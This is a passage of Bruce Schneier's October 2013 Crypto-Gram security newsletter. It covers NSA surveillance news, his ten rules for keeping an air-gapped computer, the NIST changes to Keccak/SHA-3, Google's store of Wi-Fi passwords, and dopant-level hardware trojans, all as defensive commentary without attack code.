https://www.schneier.com/blog/archives/2013/09/…

NSA collecting travel data:
http://papersplease.org/wp/2013/09/29/…


News

The Chaos Computer club successfully hacked the iPhone fingerprint reader.
https://www.schneier.com/blog/archives/2013/09/…

Interesting paper: “Three Paradoxes of Big Data,” by Neil M. Richards and Jonathan H. King, Stanford Law Review Online, 2013.
http://papers.ssrn.com/sol3/papers.cfm?…
http://www.stanfordlawreview.org/online/…

A 3D-printed robot can break Android PINs. The reason it works is that the Android system doesn’t start putting in very long delays between PIN attempts after a whole bunch of unsuccessful attempts. The iPhone does.
http://mashable.com/2013/07/25/3d-printed-robot-pin/

ICANN has a draft study that looks at abuse of the Whois database.
http://www.icann.org/en/news/announcements/…
http://www.lightbluetouchpaper.org/2013/09/25/…

“When everything is classified, then nothing is classified.”
http://www2.gwu.edu/~nsarchiv/NSAEBB/NSAEBB48/…

Gabriella Coleman has published an interesting analysis of the hacker group Anonymous.
http://www.cigionline.org/publications/2013/9/…

Details of how the FBI found the administrator of Silk Road, a popular black market e-commerce site. It was bad operational security.
http://arstechnica.com/security/2013/10/…
We already know that it is next to impossible to maintain privacy and anonymity against a well-funded government adversary.
https://www.schneier.com/essay-418.html
Another article:
http://www.slate.com/s/crime/2013/10/02/…

Is cybersecurity a profession? A National Academy of Sciences panel says no.
http://www.nap.edu/catalog.php?record_id=18446
http://www.csoonline.com/article/740456/…

What’s interesting is that this matchstick-sized acoustic sensor can be attached to drones.
https://www.schneier.com/blog/archives/2013/10/…

This is a new postal privacy product. The idea is basically to use indirection to hide physical addresses. You would get a random number to give to your correspondents, and the post office would use that number to determine your real address. No security against government surveillance, but potentially valuable nonetheless.
https://www.schneier.com/blog/archives/2013/10/…

There’s a serious random-number generation flaw in the cryptographic systems used to protect the Taiwanese digital ID.
http://arstechnica.com/security/2013/09/…
http://smartfacts.cr.yp.to/smartfacts-20130916.pdf

Build your own Enigma.
http://www.instructables.com/id/…

Azerbaijan achieves a new low in voter fraud. The government accidentally publishes the results of the election before the polls open.
https://www.schneier.com/blog/archives/2013/10/…

The NSA has the ability to fingerprint burner phones by querying the call-record database.
https://www.schneier.com/blog/archives/2013/10/…

Insecurities in the Linux /dev/random.
http://eprint.iacr.org/2013/338.pdf

Massive MIMO cryptosystem:
http://arxiv.org/abs/1310.1861
MIMO stands for “multiple-input multiple-output.” I had to look that up. In general, I’m not optimistic about the security of these sorts of systems. Whenever non-cryptographers come up with cryptographic algorithms based on some novel problem that’s hard in their area of research, invariably there are pretty easy cryptographic attacks. So consider this a good research exercise for all budding cryptanalysts out there.

Safeslinger: a new secure smart phone app.
https://www.schneier.com/blog/archives/2013/10/…


Air Gaps

Since I started working with Snowden’s documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use—or should use—air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama Bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they’re hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that’s not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there’s the potential for attack.

And air gaps *have* been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Chinese in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden’s NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

1. When you set up your computer, connect it to the Internet as little as possible. It’s impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend’s network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of *that* to the air gap machine using a one-way process.)

2. Install the minimum software set you need to do your job, and disable all operating system services that you won’t need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That’s all. (No, I don’t have any inside knowledge about TrueCrypt, and there’s a lot about it that makes me suspicious. But for Windows full-disk encryption it’s that, Microsoft’s BitLocker, or Symantec’s PGPDisk—and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn’t get turned on by accident.

4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it’s an attempt to make it harder for the attacker to target your computer.

5. Turn off all autorun features. This should be standard practice for all the computers you own, but it’s especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don’t worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You’re not on the Internet, after all.

7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don’t know—or one you find in a parking lot.

8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can’t spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you’ve only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation—not read *or* write; I’ve got one of those—wins a prize.

9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files. If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can’t break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale.

10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you’ll be moving public files and it won’t matter, but sometimes you won’t be, and it will. And if you’re using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don’t forget to encrypt the computer as well; whole-disk encryption is the best.

One thing I didn’t do, although it’s worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD—you can keep your data on an encrypted USB stick—is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it’s probably impossible to enforce for any network more complicated than a single computer with a single user. But if you’re thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you’re going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that’s too much paranoia for me right now.

This essay previously appeared on Wired.com.
http://www.wired.com/opinion/2013/10/149481/

Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

My previous advice:
https://www.schneier.com/essay-450.html

Bin Laden had an air gap:
https://www.schneier.com/blog/archives/2011/05/…

agent.btz:
http://www.washingtonpost.com/national/…

TrueCrypt:
http://www.truecrypt.org/

BleachBit:
http://bleachbit.sourceforge.net/

People plugging in found USB drives:
https://www.schneier.com/blog/archives/2012/07/…

Tails:
https://tails.boum.org/


Will Keccak = SHA-3?

Last year, NIST selected Keccak as the winner of the SHA-3 hash function competition. Yes, I would have rather my own Skein had won, but it was a good choice.

But last August, John Kelsey announced some changes to Keccak in a talk (slides 44-48 are relevant). Basically, the capacity levels were reduced in the name of software performance, and that affects security. One of Keccak’s nice features is that it’s highly tunable.

Normally, this wouldn’t be a big deal. But in light of the Snowden documents that reveal that the NSA has attempted to intentionally weaken cryptographic standards, this is a huge deal.

To be sure, I do not believe that the NIST changes were suggested by the NSA. Nor do I believe that the changes make the algorithm easier to break by the NSA. I believe NIST made the changes in good faith, and the result is a better security/performance trade-off. My problem with the changes isn’t cryptographic, it’s perceptual. There is so little trust in the NSA right now, and that mistrust is reflecting on NIST. I worry that the changed algorithm won’t be accepted by an understandably skeptical security community, and that no one (except those forced) will use SHA-3 as a result.

This is a lousy outcome. NIST has done a great job with cryptographic competitions: both a decade ago with AES and now with SHA-3. This is just another effect of the NSA’s actions draining the trust out of the Internet.

At this point, NIST simply has to standardize on Keccak as submitted and as selected.

Kelsey’s talk:
https://docs.google.com/file/d/…

NSA weakening cryptography:
http://www.nytimes.com/2013/09/06/us/…

Too much mistrust:
https://www.schneier.com/essay-447.html

CDT’s post on this:
https://www.cdt.org/s/joseph-lorenzo-hall/…

Slashdot threat:
http://yro.slashdot.org/story/13/09/28/0219235/…

Response from the Keccak team:
http://keccak.noekeon.org/yes_this_is_keccak.html


Schneier News

I spoke at TEDxCambridge last month on security and power. Here’s the video. I am *very* happy with it. It’s only 12 minutes long, and I packed a lot into that time.
http://www.youtube.com/watch?v=h0d_QDgl3gI

I was interviewed for Technology Review on the NSA and the Snowden documents.
http://www.technologyreview.com/news/519336/…

My picture on a “trust the math” T-shirt.
http://www.zerodayclothing.com/products/…

This is a video of me talking about surveillance and privacy, both relating to the NSA and surveillance more generally. It’s from a conference at EPFL in Lausanne, Switzerland.
http://slideshot.epfl.ch/play/cops_schneier
http://www.youtube.com/watch?v=Skr-jIqISO0

This is a Tumblr feed on things I say. I have nothing to do with it.
http://shitthatschneiersays.tumblr.com/


Google Knows Every Wi-Fi Password in the World

This article points out that as people are logging into Wi-Fi networks from their Android phones, and backing up those passwords along with everything else into Google’s cloud, that Google is amassing an enormous database of the world’s Wi-Fi passwords. And while it’s not every Wi-Fi password in the world, it’s almost certainly a large percentage of them.

Leaving aside Google’s intentions regarding this database, it is certainly something that the US government could force Google to turn over with a National Security Letter.

Something else to think about.

http://s.computerworld.com/android/22806/…


Surreptitiously Tampering with Computer Chips

This is really interesting research: “Stealthy Dopant-Level Hardware Trojans.” Basically, you can tamper with a logic gate to be either stuck-on or stuck-off by changing the doping of one transistor. This sort of sabotage is undetectable by functional testing or optical inspection. And it can be done at mask generation—very late in the design process—since it does not require adding circuits, changing the circuit layout, or anything else. All this makes it *really* hard to detect.

The paper talks about several uses for this type of sabotage, but the most interesting—and devastating—is to modify a chip’s random number generator. This technique could, for example, reduce the amount of entropy in Intel’s hardware random number generator from 128 bits to 32 bits. This could be done without triggering any of the built-in self-tests, without disabling any of the built-in self-tests, and without failing any randomness tests.

I have no idea if the NSA convinced Intel to do this with the hardware random number generator it embedded into its CPU chips, but I do know that it could. And I was always leery of Intel strongly pushing for applications to use the output of its hardware RNG directly and not putting it through some strong software PRNG like Fortuna. And now Theodore Ts’o writes this about Linux: “I am so glad I resisted pressure from Intel engineers to let /dev/random rely only on the RDRAND instruction.”

Yes, this is a conspiracy theory. But I’m not willing to discount such things anymore. That’s the worst thing about the NSA’s actions. We have no idea whom we can trust.

Research paper:
http://people.umass.edu/gbecker/BeckerChes13.pdf

Fortuna:
https://en.wikipedia.org/wiki/Fortuna_%28PRNG%29

Tso’s essay:
https://plus.google.com/117091380454742934025/posts/…

We don’t know who to trust anymore:
https://www.schneier.com/essay-435.html
https://www.schneier.com/essay-447.html


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <http://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT—formerly British Telecom. See <http://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of BT.

Copyright (c) 2013 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.